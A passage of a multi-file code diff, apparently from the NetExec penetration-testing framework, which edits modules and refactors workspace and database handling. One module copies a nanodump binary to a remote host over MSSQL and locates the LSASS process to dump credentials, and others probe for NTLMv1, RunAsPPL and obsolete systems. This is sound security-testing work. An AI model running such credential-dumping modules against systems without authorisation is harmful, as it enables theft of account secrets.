$PowershellExe=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\powershell.exe'
|
||||
$PowershellExe=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'
|
||||
if([Environment]::Is64BitProcess) {{ $PowershellExe='powershell.exe'}}
|
||||
$ProcessInfo = New-Object System.Diagnostics.ProcessStartInfo
|
||||
$ProcessInfo.FileName=$PowershellExe
|
||||
|
|
|
@ -248,7 +248,7 @@ class NXCModule:
|
|||
]
|
||||
|
||||
# Create the IPC string
|
||||
ipc = f"\\\\{ip}\IPC$\x00"
|
||||
ipc = f"\\\\{ip}\\IPC$\x00"
|
||||
self.logger.debug(f"Connecting to {ip} with UID: {userid.hex()}")
|
||||
|
||||
# Initialize the tree connect andx request
|
||||
|
|
|
@ -98,7 +98,7 @@ class NXCModule:
|
|||
with open(os.path.join(self.nano_path, self.nano), "rb") as nano:
|
||||
try:
|
||||
self.context.log.display(f"Copy {self.nano} to {self.remote_tmp_dir}")
|
||||
exec_method = MSSQLEXEC(self.connection.conn)
|
||||
exec_method = MSSQLEXEC(self.connection.conn, self.context.log)
|
||||
exec_method.put_file(nano.read(), self.remote_tmp_dir + self.nano)
|
||||
if exec_method.file_exists(self.remote_tmp_dir + self.nano):
|
||||
self.context.log.success(f"Created file {self.nano} on the remote machine {self.remote_tmp_dir}")
|
||||
|
@ -118,13 +118,13 @@ class NXCModule:
|
|||
self.context.log.display(f"Getting LSASS PID via command {command}")
|
||||
p = self.connection.execute(command, display_output)
|
||||
self.context.log.debug(f"tasklist Command Result: {p}")
|
||||
if len(p) == 1:
|
||||
p = p[0]
|
||||
|
||||
if not p or p == "None":
|
||||
self.context.log.fail("Failed to execute command to get LSASS PID")
|
||||
return
|
||||
|
||||
if len(p) == 1:
|
||||
p = p[0]
|
||||
|
||||
pid = p.split(",")[1][1:-1]
|
||||
self.context.log.debug(f"pid: {pid}")
|
||||
timestamp = datetime.today().strftime("%Y%m%d_%H%M")
|
||||
|
|
|
@ -7,10 +7,11 @@ class NXCModule:
|
|||
"""
|
||||
Detect if the target's LmCompatibilityLevel will allow NTLMv1 authentication
|
||||
Module by @Tw1sm
|
||||
Modified by Deft (08/02/2024)
|
||||
"""
|
||||
|
||||
name = "ntlmv1"
|
||||
description = "Detect if lmcompatibilitylevel on the target is set to 0 or 1"
|
||||
description = "Detect if lmcompatibilitylevel on the target is set to lower than 3 (which means ntlmv1 is enabled)"
|
||||
supported_protocols = ["smb"]
|
||||
opsec_safe = True
|
||||
multiple_hosts = True
|
||||
|
@ -32,19 +33,22 @@ class NXCModule:
|
|||
"SYSTEM\\CurrentControlSet\\Control\\Lsa",
|
||||
)
|
||||
key_handle = ans["phkResult"]
|
||||
rtype = None
|
||||
data = None
|
||||
rtype = data = None
|
||||
try:
|
||||
rtype, data = rrp.hBaseRegQueryValue(
|
||||
remote_ops._RemoteOperations__rrp,
|
||||
key_handle,
|
||||
"lmcompatibilitylevel\x00",
|
||||
)
|
||||
|
||||
except rrp.DCERPCSessionError:
|
||||
context.log.debug("Unable to reference lmcompatabilitylevel, which probably means ntlmv1 is not set")
|
||||
|
||||
if rtype and data and int(data) in [0, 1, 2]:
|
||||
# Changed by Defte
|
||||
# Unless this keys is set to 3 or higher, NTLMv1 can be used
|
||||
if data in [0, 1, 2]:
|
||||
context.log.highlight(self.output.format(connection.conn.getRemoteHost(), data))
|
||||
|
||||
except DCERPCSessionError as e:
|
||||
context.log.debug(f"Error connecting to RemoteRegistry: {e}")
|
||||
finally:
|
||||
|
|
|
@ -0,0 +1,84 @@
|
|||
#!/usr/bin/env python3
|
||||
|
||||
from datetime import datetime, timedelta
|
||||
from nxc.paths import NXC_PATH
|
||||
import socket
|
||||
|
||||
|
||||
class NXCModule:
|
||||
"""
|
||||
Extract obsolete operating systems from LDAP
|
||||
Module by Brandon Fisher @shad0wcntr0ller
|
||||
"""
|
||||
name = "obsolete"
|
||||
description = "Extract all obsolete operating systems from LDAP"
|
||||
supported_protocols = ["ldap"]
|
||||
opsec_safe = True
|
||||
multiple_hosts = True
|
||||
|
||||
def ldap_time_to_datetime(self, ldap_time):
|
||||
"""Convert an LDAP timestamp to a datetime object."""
|
||||
if ldap_time == "0": # Account for never-set passwords
|
||||
return "Never"
|
||||
try:
|
||||
epoch = datetime(1601, 1, 1) + timedelta(seconds=int(ldap_time) / 10000000)
|
||||
return epoch.strftime("%Y-%m-%d %H:%M:%S")
|
||||
except Exception:
|
||||
return "Conversion Error"
|
||||
|
||||
def options(self, context, module_options):
|
||||
"""No module-specific options required."""
|
||||
|
||||
def on_login(self, context, connection):
|
||||
search_filter = ("(&(objectclass=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2))"
|
||||
"(|(operatingSystem=*Windows 6*)(operatingSystem=*Windows 2000*)"
|
||||
"(operatingSystem=*Windows XP*)(operatingSystem=*Windows Vista*)"
|
||||
"(operatingSystem=*Windows 7*)(operatingSystem=*Windows 8*)"
|
||||
"(operatingSystem=*Windows 8.1*)(operatingSystem=*Windows Server 2003*)"
|
||||
"(operatingSystem=*Windows Server 2008*)(operatingSystem=*Windows Server 2012*)))")
|
||||
attributes = ["name", "operatingSystem", "dNSHostName", "pwdLastSet"]
|
||||
|
||||
try:
|
||||
context.log.debug(f"Search Filter={search_filter}")
|
||||
resp = connection.ldapConnection.search(searchFilter=search_filter, attributes=attributes, sizeLimit=0)
|
||||
except Exception:
|
||||
context.log.error("LDAP search error:", exc_info=True)
|
||||
return False
|
||||
|
||||
answers = []
|
||||
context.log.debug(f"Total of records returned {len(resp)}")
|
||||
|
||||
for item in resp:
|
||||
if "attributes" not in item:
|
||||
continue
|
||||
dns_hostname, pwd_last_set = "", "0" # Default '0' for pwdLastSet
|
||||
for attribute in item["attributes"]:
|
||||
attr_type = str(attribute["type"])
|
||||
if attr_type == "operatingSystem":
|
||||
os = str(attribute["vals"][0])
|
||||
elif attr_type == "dNSHostName":
|
||||
dns_hostname = str(attribute["vals"][0])
|
||||
elif attr_type == "pwdLastSet":
|
||||
pwd_last_set = str(attribute["vals"][0])
|
||||
|
||||
if dns_hostname and os:
|
||||
pwd_last_set_readable = self.ldap_time_to_datetime(pwd_last_set)
|
||||
try:
|
||||
ip_address = socket.gethostbyname(dns_hostname)
|
||||
answers.append((dns_hostname, ip_address, os, pwd_last_set_readable))
|
||||
except socket.gaierror:
|
||||
answers.append((dns_hostname, "N/A", os, pwd_last_set_readable))
|
||||
|
||||
if answers:
|
||||
obsolete_hosts_count = len(answers)
|
||||
filename = f"{NXC_PATH}/logs/{connection.domain}.obsoletehosts.txt"
|
||||
context.log.display(f"{obsolete_hosts_count} Obsolete hosts will be saved to {filename}")
|
||||
with open(filename, "w") as f:
|
||||
for dns_hostname, ip_address, os, pwd_last_set_readable in answers:
|
||||
log_message = f"{dns_hostname} ({ip_address}) : {os} [pwd-last-set: {pwd_last_set_readable}]"
|
||||
context.log.highlight(log_message)
|
||||
f.write(log_message + "\n")
|
||||
else:
|
||||
context.log.display("No Obsolete Hosts Identified")
|
||||
|
||||
return True
|
|
@ -14,8 +14,8 @@ class NXCModule:
|
|||
""""""
|
||||
|
||||
def on_admin_login(self, context, connection):
|
||||
command = "reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\ /v RunAsPPL"
|
||||
context.log.display("Executing command")
|
||||
command = r"reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\ /v RunAsPPL"
|
||||
context.log.debug(f"Executing command: {command}")
|
||||
p = connection.execute(command, True)
|
||||
if "The system was unable to find the specified registry key or value" in p:
|
||||
context.log.debug("Unable to find RunAsPPL Registry Key")
|
||||
|
|
|
@ -168,33 +168,33 @@ class HostChecker:
|
|||
def init_checks(self):
|
||||
# Declare the checks to do and how to do them
|
||||
self.checks = [
|
||||
ConfigCheck("Last successful update", "Checks how old is the last successful update", checkers=[self.check_last_successful_update]),
|
||||
ConfigCheck("LAPS", "Checks if LAPS is installed", checkers=[self.check_laps]),
|
||||
ConfigCheck("Administrator's name", "Checks if Administror user name has been changed", checkers=[self.check_administrator_name]),
|
||||
ConfigCheck("Last successful update age", "Checks how old is the last successful update", checkers=[self.check_last_successful_update]),
|
||||
ConfigCheck("LAPS installed", "Checks if LAPS is installed", checkers=[self.check_laps]),
|
||||
ConfigCheck("Administrator account renamed", "Checks if Administror user name has been changed", checkers=[self.check_administrator_name]),
|
||||
ConfigCheck("UAC configuration", "Checks if UAC configuration is secure", checker_args=[[self, ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "EnableLUA", 1), ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "LocalAccountTokenFilterPolicy", 0)]]),
|
||||
ConfigCheck("Hash storage format", "Checks if storing hashes in LM format is disabled", checker_args=[[self, ("HKLM\\System\\CurrentControlSet\\Control\\Lsa", "NoLMHash", 1)]]),
|
||||
ConfigCheck("Always install elevated", "Checks if AlwaysInstallElevated is disabled", checker_args=[[self, ("HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer", "AlwaysInstallElevated", 0)]]),
|
||||
ConfigCheck("IPv6 preference", "Checks if IPv6 is preferred over IPv4", checker_args=[[self, ("HKLM\\SYSTEM\\CurrentControlSet\\Services\\Tcpip6\\Parameters", "DisabledComponents", (32, 255), in_)]]),
|
||||
ConfigCheck("Spooler service", "Checks if the spooler service is disabled", checkers=[self.check_spooler_service]),
|
||||
ConfigCheck("WDigest authentication", "Checks if WDigest authentication is disabled", checker_args=[[self, ("HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest", "UseLogonCredential", 0)]]),
|
||||
ConfigCheck("LM hash storage disabled", "Checks if storing hashes in LM format is disabled", checker_args=[[self, ("HKLM\\System\\CurrentControlSet\\Control\\Lsa", "NoLMHash", 1)]]),
|
||||
ConfigCheck("Always install elevated disabled", "Checks if AlwaysInstallElevated is disabled", checker_args=[[self, ("HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer", "AlwaysInstallElevated", 0)]]),
|
||||
ConfigCheck("IPv4 preferred over IPv6", "Checks if IPv4 is preferred over IPv6", checker_args=[[self, ("HKLM\\SYSTEM\\CurrentControlSet\\Services\\Tcpip6\\Parameters", "DisabledComponents", (32, 255), in_)]]),
|
||||
ConfigCheck("Spooler service disabled", "Checks if the spooler service is disabled", checkers=[self.check_spooler_service]),
|
||||
ConfigCheck("WDigest authentication disabled", "Checks if WDigest authentication is disabled", checker_args=[[self, ("HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest", "UseLogonCredential", 0)]]),
|
||||
ConfigCheck("WSUS configuration", "Checks if WSUS configuration uses HTTPS", checkers=[self.check_wsus_running, None], checker_args=[[], [self, ("HKLM\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate", "WUServer", "https://", startswith), ("HKLM\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate", "UseWUServer", 0, operator.eq)]], checker_kwargs=[{}, {"options": {"lastWins": True}}]),
|
||||
ConfigCheck("LSA cache", "Checks how many logons are kept in the LSA cache", checker_args=[[self, ("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "CachedLogonsCount", 2, le)]]),
|
||||
ConfigCheck("AppLocker", "Checks if there are AppLocker rules defined", checkers=[self.check_applocker]),
|
||||
ConfigCheck("Small LSA cache", "Checks how many logons are kept in the LSA cache", checker_args=[[self, ("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "CachedLogonsCount", 2, le)]]),
|
||||
ConfigCheck("AppLocker rules defined", "Checks if there are AppLocker rules defined", checkers=[self.check_applocker]),
|
||||
ConfigCheck("RDP expiration time", "Checks RDP session timeout", checker_args=[[self, ("HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services", "MaxDisconnectionTime", 0, operator.gt), ("HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services", "MaxDisconnectionTime", 0, operator.gt)]]),
|
||||
ConfigCheck("CredentialGuard", "Checks if CredentialGuard is enabled", checker_args=[[self, ("HKLM\\SYSTEM\\CurrentControlSet\\Control\\DeviceGuard", "EnableVirtualizationBasedSecurity", 1), ("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa", "LsaCfgFlags", 1)]]),
|
||||
ConfigCheck("PPL", "Checks if lsass runs as a protected process", checker_args=[[self, ("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa", "RunAsPPL", 1)]]),
|
||||
ConfigCheck("Powershell v2 availability", "Checks if powershell v2 is available", checker_args=[[self, ("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\3\\PowerShellEngine", "PSCompatibleVersion", "2.0", not_(operator.contains))]]),
|
||||
ConfigCheck("LmCompatibilityLevel", "Checks if LmCompatibilityLevel is set to 5", checker_args=[[self, ("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa", "LmCompatibilityLevel", 5, operator.ge)]]),
|
||||
ConfigCheck("NBTNS", "Checks if NBTNS is disabled on all interfaces", checkers=[self.check_nbtns]),
|
||||
ConfigCheck("mDNS", "Checks if mDNS is disabled", checker_args=[[self, ("HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNScache\\Parameters", "EnableMDNS", 0)]]),
|
||||
ConfigCheck("SMB signing", "Checks if SMB signing is enabled", checker_args=[[self, ("HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Parameters", "requiresecuritysignature", 1)]]),
|
||||
ConfigCheck("LDAP signing", "Checks if LDAP signing is enabled", checker_args=[[self, ("HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters", "LDAPServerIntegrity", 2), ("HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS", "LdapEnforceChannelBinding", 2)]]),
|
||||
ConfigCheck("SMB encryption", "Checks if SMB encryption is enabled", checker_args=[[self, ("HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters", "EncryptData", 1)]]),
|
||||
ConfigCheck("CredentialGuard enabled", "Checks if CredentialGuard is enabled", checker_args=[[self, ("HKLM\\SYSTEM\\CurrentControlSet\\Control\\DeviceGuard", "EnableVirtualizationBasedSecurity", 1), ("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa", "LsaCfgFlags", 1)]]),
|
||||
ConfigCheck("Lsass run as PPL", "Checks if lsass runs as a protected process", checker_args=[[self, ("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa", "RunAsPPL", 1)]]),
|
||||
ConfigCheck("No Powershell v2", "Checks if powershell v2 is available", checker_args=[[self, ("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\3\\PowerShellEngine", "PSCompatibleVersion", "2.0", not_(operator.contains))]]),
|
||||
ConfigCheck("LmCompatibilityLevel == 5", "Checks if LmCompatibilityLevel is set to 5", checker_args=[[self, ("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa", "LmCompatibilityLevel", 5, operator.ge)]]),
|
||||
ConfigCheck("NBTNS disabled", "Checks if NBTNS is disabled on all interfaces", checkers=[self.check_nbtns]),
|
||||
ConfigCheck("mDNS disabled", "Checks if mDNS is disabled", checker_args=[[self, ("HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNScache\\Parameters", "EnableMDNS", 0)]]),
|
||||
ConfigCheck("SMB signing enabled", "Checks if SMB signing is enabled", checker_args=[[self, ("HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Parameters", "requiresecuritysignature", 1)]]),
|
||||
ConfigCheck("LDAP signing enabled", "Checks if LDAP signing is enabled", checker_args=[[self, ("HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters", "LDAPServerIntegrity", 2), ("HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS", "LdapEnforceChannelBinding", 2)]]),
|
||||
ConfigCheck("SMB encryption enabled", "Checks if SMB encryption is enabled", checker_args=[[self, ("HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters", "EncryptData", 1)]]),
|
||||
ConfigCheck("RDP authentication", "Checks RDP authentication configuration (NLA auth and restricted admin mode)", checker_args=[[self, ("HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\", "UserAuthentication", 1), ("HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA", "RestrictedAdminMode", 1)]]),
|
||||
ConfigCheck("BitLocker configuration", "Checks the BitLocker configuration (based on https://www.stigviewer.com/stig/windows_10/2020-06-15/finding/V-94859)", checker_args=[[self, ("HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE", "UseAdvancedStartup", 1), ("HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE", "UseTPMPIN", 1)]]),
|
||||
ConfigCheck("Guest account disabled", "Checks if the guest account is disabled", checkers=[self.check_guest_account_disabled]),
|
||||
ConfigCheck("Automatic session lock", "Checks if the session is automatically locked on after a period of inactivity", checker_args=[[self, ("HKCU\\Control Panel\\Desktop", "ScreenSaverIsSecure", 1), ("HKCU\\Control Panel\\Desktop", "ScreenSaveTimeOut", 300, le)]]),
|
||||
ConfigCheck("Powershell Execution Policy", 'Checks if the Powershell execution policy is set to "Restricted"', checker_args=[[self, ("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\ShellIds\Microsoft.Powershell", "ExecutionPolicy", "Restricted\x00"), ("HKCU\\SOFTWARE\\Microsoft\\PowerShell\\1\ShellIds\Microsoft.Powershell", "ExecutionPolicy", "Restricted\x00")]], checker_kwargs=[{"options": {"KOIfMissing": False, "lastWins": True}}])
|
||||
ConfigCheck("Automatic session lock enabled", "Checks if the session is automatically locked on after a period of inactivity", checker_args=[[self, ("HKCU\\Control Panel\\Desktop", "ScreenSaverIsSecure", 1), ("HKCU\\Control Panel\\Desktop", "ScreenSaveTimeOut", 300, le)]]),
|
||||
ConfigCheck('Powershell Execution Policy == "Restricted"', 'Checks if the Powershell execution policy is set to "Restricted"', checker_args=[[self, ("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.Powershell", "ExecutionPolicy", "Restricted\x00"), ("HKCU\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.Powershell", "ExecutionPolicy", "Restricted\x00")]], checker_kwargs=[{"options": {"KOIfMissing": False, "lastWins": True}}])
|
||||
]
|
||||
|
||||
# Add check to conf_checks table if missing
|
||||
|
|
|
@ -12,6 +12,7 @@ from nxc.paths import NXC_PATH
|
|||
from nxc.console import nxc_console
|
||||
from nxc.logger import nxc_logger
|
||||
from nxc.config import nxc_config, nxc_workspace, config_log, ignore_opsec
|
||||
from nxc.database import create_db_engine
|
||||
from concurrent.futures import ThreadPoolExecutor, as_completed
|
||||
import asyncio
|
||||
from nxc.helpers import powershell
|
||||
|
@ -21,7 +22,6 @@ from os.path import exists
|
|||
from os.path import join as path_join
|
||||
from sys import exit
|
||||
import logging
|
||||
import sqlalchemy
|
||||
from rich.progress import Progress
|
||||
import platform
|
||||
|
||||
|
@ -38,17 +38,13 @@ if platform.system() != "Windows":
|
|||
resource.setrlimit(resource.RLIMIT_NOFILE, file_limit)
|
||||
|
||||
|
||||
|
||||
def create_db_engine(db_path):
|
||||
return sqlalchemy.create_engine(f"sqlite:///{db_path}", isolation_level="AUTOCOMMIT", future=True)
|
||||
|
||||
|
||||
async def start_run(protocol_obj, args, db, targets):
|
||||
futures = []
|
||||
nxc_logger.debug("Creating ThreadPoolExecutor")
|
||||
if args.no_progress or len(targets) == 1:
|
||||
with ThreadPoolExecutor(max_workers=args.threads + 1) as executor:
|
||||
nxc_logger.debug(f"Creating thread for {protocol_obj}")
|
||||
_ = [executor.submit(protocol_obj, args, db, target) for target in targets]
|
||||
futures = [executor.submit(protocol_obj, args, db, target) for target in targets]
|
||||
else:
|
||||
with Progress(console=nxc_console) as progress, ThreadPoolExecutor(max_workers=args.threads + 1) as executor:
|
||||
current = 0
|
||||
|
@ -62,6 +58,11 @@ async def start_run(protocol_obj, args, db, targets):
|
|||
for _ in as_completed(futures):
|
||||
current += 1
|
||||
progress.update(tasks, completed=current)
|
||||
for future in as_completed(futures):
|
||||
try:
|
||||
future.result()
|
||||
except Exception:
|
||||
nxc_logger.exception(f"Exception for target {targets[futures.index(future)]}: {future.exception()}")
|
||||
|
||||
|
||||
def main():
|
||||
|
|
138
nxc/nxcdb.py
138
nxc/nxcdb.py
|
@ -1,31 +1,25 @@
|
|||
import cmd
|
||||
import configparser
|
||||
import csv
|
||||
import sys
|
||||
import os
|
||||
import argparse
|
||||
from os import listdir
|
||||
from os.path import exists
|
||||
from os.path import join as path_join
|
||||
import shutil
|
||||
from sqlite3 import connect
|
||||
import sys
|
||||
from textwrap import dedent
|
||||
|
||||
from requests import get, post, ConnectionError
|
||||
from sqlalchemy import create_engine
|
||||
from terminaltables import AsciiTable
|
||||
from termcolor import colored
|
||||
|
||||
from nxc.loaders.protocolloader import ProtocolLoader
|
||||
from nxc.paths import CONFIG_PATH, WS_PATH, WORKSPACE_DIR
|
||||
from nxc.paths import CONFIG_PATH, WORKSPACE_DIR
|
||||
from nxc.database import create_db_engine, open_config, get_workspace, get_db, write_configfile, create_workspace, set_workspace
|
||||
|
||||
|
||||
class UserExitedProto(Exception):
|
||||
pass
|
||||
|
||||
|
||||
def create_db_engine(db_path):
|
||||
return create_engine(f"sqlite:///{db_path}", isolation_level="AUTOCOMMIT", future=True)
|
||||
|
||||
|
||||
def print_table(data, title=None):
|
||||
print()
|
||||
table = AsciiTable(data)
|
||||
|
@ -446,29 +440,15 @@ class NXCDBMenu(cmd.Cmd):
|
|||
def __init__(self, config_path):
|
||||
cmd.Cmd.__init__(self)
|
||||
self.config_path = config_path
|
||||
|
||||
try:
|
||||
self.config = configparser.ConfigParser()
|
||||
self.config.read(self.config_path)
|
||||
except Exception as e:
|
||||
print(f"[-] Error reading nxc.conf: {e}")
|
||||
sys.exit(1)
|
||||
|
||||
self.conn = None
|
||||
self.p_loader = ProtocolLoader()
|
||||
self.protocols = self.p_loader.get_protocols()
|
||||
|
||||
self.workspace = self.config.get("nxc", "workspace")
|
||||
self.config = open_config(self.config_path)
|
||||
self.workspace = get_workspace(self.config)
|
||||
self.db = get_db(self.config)
|
||||
self.do_workspace(self.workspace)
|
||||
|
||||
self.db = self.config.get("nxc", "last_used_db")
|
||||
if self.db:
|
||||
self.do_proto(self.db)
|
||||
|
||||
def write_configfile(self):
|
||||
with open(self.config_path, "w") as configfile:
|
||||
self.config.write(configfile)
|
||||
|
||||
def do_proto(self, proto):
|
||||
if not proto:
|
||||
return
|
||||
|
@ -479,7 +459,7 @@ class NXCDBMenu(cmd.Cmd):
|
|||
db_nav_object = self.p_loader.load_protocol(self.protocols[proto]["nvpath"])
|
||||
db_object = self.p_loader.load_protocol(self.protocols[proto]["dbpath"])
|
||||
self.config.set("nxc", "last_used_db", proto)
|
||||
self.write_configfile()
|
||||
write_configfile(self.config, self.config_path)
|
||||
try:
|
||||
proto_menu = db_nav_object.navigator(self, db_object.database(self.conn), proto)
|
||||
proto_menu.cmdloop()
|
||||
|
@ -506,18 +486,18 @@ class NXCDBMenu(cmd.Cmd):
|
|||
if subcommand == "create":
|
||||
new_workspace = line.split()[1].strip()
|
||||
print(f"[*] Creating workspace '{new_workspace}'")
|
||||
self.create_workspace(new_workspace, self.p_loader, self.protocols)
|
||||
create_workspace(new_workspace, self.p_loader)
|
||||
self.do_workspace(new_workspace)
|
||||
elif subcommand == "list":
|
||||
print("[*] Enumerating Workspaces")
|
||||
for workspace in listdir(path_join(WORKSPACE_DIR)):
|
||||
if workspace == self.workspace:
|
||||
print("==> " + workspace)
|
||||
print(f" * {colored(workspace, 'green')}")
|
||||
else:
|
||||
print(workspace)
|
||||
print(f" {workspace}")
|
||||
elif exists(path_join(WORKSPACE_DIR, line)):
|
||||
self.config.set("nxc", "workspace", line)
|
||||
self.write_configfile()
|
||||
write_configfile(self.config, self.config_path)
|
||||
self.workspace = line
|
||||
self.prompt = f"nxcdb ({line}) > "
|
||||
|
||||
|
@ -538,65 +518,49 @@ class NXCDBMenu(cmd.Cmd):
|
|||
Exits
|
||||
"""
|
||||
print_help(help_string)
|
||||
|
||||
@staticmethod
|
||||
def create_workspace(workspace_name, p_loader, protocols):
|
||||
os.mkdir(path_join(WORKSPACE_DIR, workspace_name))
|
||||
|
||||
for protocol in protocols:
|
||||
protocol_object = p_loader.load_protocol(protocols[protocol]["dbpath"])
|
||||
proto_db_path = path_join(WORKSPACE_DIR, workspace_name, f"{protocol}.db")
|
||||
|
||||
if not exists(proto_db_path):
|
||||
print(f"[*] Initializing {protocol.upper()} protocol database")
|
||||
conn = connect(proto_db_path)
|
||||
c = conn.cursor()
|
||||
|
||||
# try to prevent some weird sqlite I/O errors
|
||||
c.execute("PRAGMA journal_mode = OFF")
|
||||
c.execute("PRAGMA foreign_keys = 1")
|
||||
|
||||
protocol_object.database.db_schema(c)
|
||||
|
||||
# commit the changes and close everything off
|
||||
conn.commit()
|
||||
conn.close()
|
||||
|
||||
|
||||
def delete_workspace(workspace_name):
|
||||
shutil.rmtree(path_join(WORKSPACE_DIR, workspace_name))
|
||||
|
||||
|
||||
def initialize_db(logger):
|
||||
if not exists(path_join(WS_PATH, "default")):
|
||||
logger.debug("Creating default workspace")
|
||||
os.mkdir(path_join(WS_PATH, "default"))
|
||||
|
||||
p_loader = ProtocolLoader()
|
||||
protocols = p_loader.get_protocols()
|
||||
for protocol in protocols:
|
||||
protocol_object = p_loader.load_protocol(protocols[protocol]["dbpath"])
|
||||
proto_db_path = path_join(WS_PATH, "default", f"{protocol}.db")
|
||||
|
||||
if not exists(proto_db_path):
|
||||
logger.debug(f"Initializing {protocol.upper()} protocol database")
|
||||
conn = connect(proto_db_path)
|
||||
c = conn.cursor()
|
||||
# try to prevent some weird sqlite I/O errors
|
||||
c.execute("PRAGMA journal_mode = OFF") # could try setting to PERSIST if DB corruption starts occurring
|
||||
c.execute("PRAGMA foreign_keys = 1")
|
||||
# set a small timeout (5s) so if another thread is writing to the database, the entire program doesn't crash
|
||||
c.execute("PRAGMA busy_timeout = 5000")
|
||||
protocol_object.database.db_schema(c)
|
||||
# commit the changes and close everything off
|
||||
conn.commit()
|
||||
conn.close()
|
||||
|
||||
|
||||
|
||||
def main():
|
||||
if not exists(CONFIG_PATH):
|
||||
print("[-] Unable to find config file")
|
||||
sys.exit(1)
|
||||
|
||||
parser = argparse.ArgumentParser(
|
||||
description="NXCDB is a database navigator for NXC",
|
||||
)
|
||||
parser.add_argument(
|
||||
"-gw",
|
||||
"--get-workspace",
|
||||
action="store_true",
|
||||
help="get the current workspace",
|
||||
)
|
||||
parser.add_argument(
|
||||
"-cw",
|
||||
"--create-workspace",
|
||||
help="create a new workspace",
|
||||
)
|
||||
parser.add_argument(
|
||||
"-sw",
|
||||
"--set-workspace",
|
||||
help="set the current workspace",
|
||||
)
|
||||
args = parser.parse_args()
|
||||
|
||||
if args.create_workspace:
|
||||
create_workspace(args.create_workspace)
|
||||
sys.exit()
|
||||
if args.set_workspace:
|
||||
set_workspace(CONFIG_PATH, args.set_workspace)
|
||||
sys.exit()
|
||||
if args.get_workspace:
|
||||
current_workspace = get_workspace(open_config(CONFIG_PATH))
|
||||
for workspace in listdir(path_join(WORKSPACE_DIR)):
|
||||
if workspace == current_workspace:
|
||||
print(f" * {colored(workspace, 'green')}")
|
||||
else:
|
||||
print(f" {workspace}")
|
||||
sys.exit()
|
||||
|
||||
try:
|
||||
nxcdbnav = NXCDBMenu(CONFIG_PATH)
|
||||
nxcdbnav.cmdloop()
|
||||
|
|
|
@ -8,7 +8,7 @@ if os.name == "nt":
|
|||
TMP_PATH = os.getenv("LOCALAPPDATA") + "\\Temp\\nxc_hosted"
|
||||
if hasattr(sys, "getandroidapilevel"):
|
||||
TMP_PATH = os.path.join("/data", "data", "com.termux", "files", "usr", "tmp", "nxc_hosted")
|
||||
WS_PATH = os.path.join(NXC_PATH, "workspaces")
|
||||
|
||||
CERT_PATH = os.path.join(NXC_PATH, "nxc.pem")
|
||||
CONFIG_PATH = os.path.join(NXC_PATH, "nxc.conf")
|
||||
WORKSPACE_DIR = os.path.join(NXC_PATH, "workspaces")
|
||||
|
|
|
@ -398,7 +398,7 @@ class ldap(connection):
|
|||
return False
|
||||
except (KeyError, KerberosException, OSError) as e:
|
||||
self.logger.fail(
|
||||
f"{self.domain}\\{self.username}{' from ccache' if useCache else ':%s' % (kerb_pass if not self.config.get('nxc', 'audit_mode') else self.config.get('nxc', 'audit_mode') * 8)} {e!s}",
|
||||
f"{self.domain}\\{self.username}{' from ccache' if useCache else ':%s' % (process_secret(kerb_pass))} {e!s}",
|
||||
color="red",
|
||||
)
|
||||
return False
|
||||
|
@ -441,21 +441,21 @@ class ldap(connection):
|
|||
except SessionError as e:
|
||||
error, desc = e.getErrorString()
|
||||
self.logger.fail(
|
||||
f"{self.domain}\\{self.username}{' from ccache' if useCache else ':%s' % (kerb_pass if not self.config.get('nxc', 'audit_mode') else self.config.get('nxc', 'audit_mode') * 8)} {error!s}",
|
||||
f"{self.domain}\\{self.username}{' from ccache' if useCache else ':%s' % (process_secret(kerb_pass))} {error!s}",
|
||||
color="magenta" if error in ldap_error_status else "red",
|
||||
)
|
||||
return False
|
||||
except Exception as e:
|
||||
error_code = str(e).split()[-2][:-1]
|
||||
self.logger.fail(
|
||||
f"{self.domain}\\{self.username}:{self.password if not self.config.get('nxc', 'audit_mode') else self.config.get('nxc', 'audit_mode') * 8} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}",
|
||||
